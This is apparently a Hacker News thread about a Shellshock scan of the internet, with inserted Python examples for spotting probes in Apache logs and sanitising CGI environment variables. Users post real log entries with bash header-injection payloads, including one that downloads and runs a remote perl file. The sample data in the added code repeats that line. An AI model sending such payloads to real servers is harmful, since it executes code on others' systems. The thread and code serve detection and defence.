item 8364746

Bash 'shellshock' scan of the Internet

109 points | agwa | 11 years ago | blog.erratasec.com

38 comments

agwa | 11 years ago
I've been monitoring my Apache logs all day for the string "() {". So far Robert Graham's scan is the only match. This is what the log entry looks like:

  209.126.230.72 - - [24/Sep/2014:22:07:56 +0000] "GET / HTTP/1.0" 403 492 "() { :; }; ping -c 11 216.75.60.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)"
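The search agwa describes, as an added example (not code from the thread or from the erratasec post): parse Apache combined-format lines and report which header carried the probe and what a vulnerable bash would have executed. The log lines inside are constructed, modelled on the entries posted in this thread, with RFC 5737 documentation addresses in place of the real ones.

```python
"""Flag Shellshock-style probes in Apache combined-format access logs.

Added example, not code from the thread or from the erratasec blog post.
SAMPLE_LOG is constructed, modelled on the entries posted in the thread,
with documentation addresses (192.0.2.x, 198.51.100.x, 203.0.113.x) in
place of the real scanner and payload hosts.
"""
import re

# Apache "combined" LogFormat:
#   host ident user [time] "request" status bytes "referer" "user-agent"
# Apache escapes embedded quotes as \x22, so [^"]* is safe for each field.
COMBINED_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)

# An exported bash function looks like "() { body; }"; the bug is that a
# vulnerable bash keeps parsing past the closing brace and runs whatever
# follows. Scanners vary the spacing ("() { :; }" vs "() { :;}"), so match
# loosely rather than on one literal string.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{')

SAMPLE_LOG = r'''192.0.2.10 - - [24/Sep/2014:22:07:56 +0000] "GET / HTTP/1.0" 403 492 "() { :; }; ping -c 11 198.51.100.7" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)"
192.0.2.11 - - [25/Sep/2014:12:30:00 +0000] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 302 169 "-" "() { :;}; /bin/ping -c 1 198.51.100.8"
192.0.2.12 - - [26/Sep/2014:00:26:04 +0000] "GET /cgi-bin/helpme HTTP/1.0" 302 169 "-" "() { :;}; /bin/bash -c \x22cd /tmp;wget http://203.0.113.5/jurat;curl -O /tmp/jurat http://203.0.113.5/jurat ; perl /tmp/jurat*;rm -rf /tmp/jurat\x22"
192.0.2.13 - - [26/Sep/2014:09:00:00 +0000] "GET /index.html HTTP/1.1" 200 1234 "-" "Mozilla/5.0 (X11; Linux x86_64)"
'''


def parse_combined(line):
    """Split one combined-format line into named fields, or None if it does not parse."""
    m = COMBINED_RE.match(line)
    return m.groupdict() if m else None


def shellshock_payloads(entry):
    """Return (field, command) pairs for every field carrying a probe.

    The command is what a vulnerable bash would run: the text after the
    function body's closing "};". If the scanner omitted that, report the
    whole value so nothing is silently dropped.
    """
    hits = []
    for field in ("referer", "agent", "request"):
        value = entry[field]
        if SHELLSHOCK_RE.search(value):
            _, sep, tail = value.partition("};")
            hits.append((field, tail.strip() if sep else value))
    return hits


def scan(log_text):
    """Scan a whole log and return one finding per probing field."""
    findings = []
    for line in log_text.splitlines():
        entry = parse_combined(line)
        if entry is None:
            continue
        request = entry["request"]
        path = request.split(" ")[1] if " " in request else request
        for field, command in shellshock_payloads(entry):
            findings.append({
                "host": entry["host"],
                "time": entry["time"],
                "path": path,
                "status": entry["status"],
                "field": field,
                "command": command,
            })
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['host']} {f['status']} {f['path']} via {f['field']}: {f['command']}")
```

The status and path are kept in each finding for triage: a probe against "/" that drew a 403, or against a CGI path that drew a 404, never reached a CGI script, so Apache never handed the header to bash; the entry still identifies the scanner and the callback host it expected a ping from.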
gojomo | 11 years ago
Someone not wanting to stick out might only probe headers that are less-often logged, but still possibly passed-along as environment variables. Has anyone logged 'HTTP_FROM' in a long while?
ProblemFactory | 11 years ago
Thanks for the idea. Looks like there is someone out there already trying to download and install remote shells:

    access.log:89.207.135.125 - - [25/Sep/2014:12:30:00 +0000] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 302 169 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
    access.log:146.71.113.194 - - [26/Sep/2014:00:26:04 +0000] "GET /cgi-bin/helpme HTTP/1.0" 302 169 "-" "() { :;}; /bin/bash -c \x22cd /tmp;wget http://213.5.67.223/jurat;curl -O /tmp/jurat http://213.5.67.223/jurat ; perl /tmp/jurat*;rm -rf /tmp/jurat\x22"
    access.log:146.71.113.194 - - [26/Sep/2014:00:26:05 +0000] "GET /cgi-bin/helpme HTTP/1.0" 404 13272 "-" "() { :;}; /bin/bash -c \x22cd /tmp;wget http://213.5.67.223/jurat;curl -O /tmp/jurat http://213.5.67.223/jurat ; perl /tmp/jurat*;rm -rf /tmp/jurat\x22"
Any suggestions on how to best check if they succeeded? I think I'm safe as I upgraded Ubuntu Bash right after the announcement, and run Nginx+Uwsgi instead of Apache with CGI enabled. But Nginx might set some environment variables somewhere as well.
gojomo | 11 years ago
Now, just to repeat the scan with:

  Referer: () { :; }; sudo apt-get update && sudo apt-get install --only-upgrade bash
"Why, who was that masked sysadmin? We didn't even get the chance to thank him."
gcr | 11 years ago
Who would grant `sudo` privileges to `www-data` without asking for a password? That's just asking for a bad time.
NamTaf | 11 years ago
Does this qualify as white-hat or grey-hat hacking? Does the doing only good outweigh the bad of modifying someone else's system?
xnull2guest | 11 years ago
Yikes, that redaction... even if it didn't miss digits that's a mighty small search space.

Really interested to see where the bug crops up aside from CGI scripts.

thefreeman | 11 years ago
Not saying I agree with it, but personally I would be worried about prosecution from doing something like the scan he is doing.
nwh | 11 years ago
Especially as it's actually executing code on other people's computers, you can't even really say it's just observation at that point.
joeshaw | 11 years ago
The DHCP attack vector is the one that is scariest to me. We know that dhclient on Linux is vulnerable, but the number of unpatched Linux machines on a public wifi network will likely be too small to be worthwhile to try to capture. Macs on the other hand are prevalent in places like coffee shops, and Apple is notoriously slow to patch security vulnerabilities in their operating systems. Has anyone done much analysis on OS X's vulnerability to this bug?
rsmarples | 11 years ago
dhcpcd-6.4.7 is not vulnerable to this issue as it sanitises variables before calling the shell.
lcedp | 11 years ago
Now I see him

    209.126.230.72 - - [25/Sep/2014:07:43:58 +0300] "GET / HTTP/1.0" 200 151 "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)"
...and someone else

    89.207.135.125 - - [25/Sep/2014:12:51:01 +0300] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 168 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
piran | 11 years ago
I just saw something from 89.207.135.125 -- no idea who that is.
showsover | 11 years ago
> Update: Someone is using masscan to deliver malware. They'll likely have compromised most of the systems I've found by tomorrow morning. If they're using different URLs and fix the Host field, they'll get tons more.
ilaksh | 11 years ago
To be vulnerable to this I need to be running CGI scripts right? I have my system set up with reverse nginx proxies and haproxy TCP mode pass through to things like nginx static files and Node.js servers. Can he run his ping command on my servers? I am thinking not.
nitrogen | 11 years ago
No, CGI is just the most obvious use of user-controlled environment variables. Other systems may also set environment variables to user-controlled strings for whatever reason. If such a system ever invokes bash, even indirectly or implicitly, with user-controlled environment variables set, that system is vulnerable.

Example non-CGI vulnerable systems from RedHat: CUPS, dhclient.
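The mechanism nitrogen describes, and the kind of sanitisation rsmarples credits dhcpcd with, as an added example (not code from the thread, from dhcpcd, or from any of the projects named above): a CGI-style gateway copies every request header into an HTTP_* environment variable, including rarely logged ones such as HTTP_FROM, so any of them can carry a function-looking value into a downstream bash. The gateway, the sanitiser and the header values are illustrative; the HTTP_* naming follows the CGI specification (RFC 3875). The last function runs the well-known local probe, which only tells you about the bash on the machine running it.

```python
"""How request headers become environment variables, and a sanitiser for them.

Added example, not code from the thread or from any project it names. The
HTTP_* naming follows RFC 3875 (CGI); the gateway, the sanitiser and the
sample headers are illustrative. The sanitiser is the kind of thing
rsmarples describes dhcpcd doing, but it is not dhcpcd's code.
"""
import os
import re
import shutil
import subprocess

# The original bash check recognised an exported function by the literal
# prefix "() {". Allowing extra whitespace here is deliberately broader than
# bash's own test, so the sanitiser errs on the side of dropping values.
FUNC_DEF_PREFIX = re.compile(r'^\s*\(\)\s*\{')


def cgi_environ(headers):
    """Map request headers to HTTP_<NAME> variables the way a CGI gateway does.

    Every header is client-controlled, including ones servers rarely log
    (From, Cookie, X-Forwarded-For), so any of them can carry the payload.
    """
    env = {}
    for name, value in headers.items():
        env["HTTP_" + name.upper().replace("-", "_")] = value
    return env


def looks_like_function_export(value):
    """True if a vulnerable bash would treat this value as a function definition."""
    return bool(FUNC_DEF_PREFIX.match(value))


def sanitise_environ(env):
    """Drop every variable whose value looks like an exported function.

    Returns (clean_env, dropped_names). Dropping rather than rewriting is
    simplest: no legitimate request header begins with "() {". This is a
    mitigation for the gateway; the fix is still to upgrade bash.
    """
    clean, dropped = {}, []
    for name, value in env.items():
        if looks_like_function_export(value):
            dropped.append(name)
        else:
            clean[name] = value
    return clean, dropped


def bash_is_vulnerable():
    """Run the standard probe against the local bash.

    Exports a function-looking variable with a trailing command, then runs
    an unrelated bash -c. A vulnerable bash executes the trailing command
    while importing the environment; a patched one ignores it. Returns None
    when no bash is installed.
    """
    bash = shutil.which("bash")
    if bash is None:
        return None
    marker = "SHELLSHOCK_MARKER_EXECUTED"
    env = {"PATH": os.environ.get("PATH", "/usr/bin:/bin"),
           "x": "() { :;}; echo " + marker}
    proc = subprocess.run([bash, "-c", "echo probe"], env=env,
                          capture_output=True, text=True)
    return marker in proc.stdout


if __name__ == "__main__":
    headers = {  # constructed request headers
        "User-Agent": "() { :;}; /bin/ping -c 1 203.0.113.9",
        "From": "() { :; }; id",  # a header almost nobody logs
        "Host": "www.example.com",
    }
    clean, dropped = sanitise_environ(cgi_environ(headers))
    print("dropped before spawning any shell:", dropped)
    print("kept:", clean)
    print("local bash vulnerable:", bash_is_vulnerable())
```

The same pattern applies to the non-CGI cases nitrogen lists: whatever the program (a DHCP client, a print daemon) exports before it runs a shell, the test is whether a client-controlled value can begin with "() {" and reach an unpatched bash unchanged.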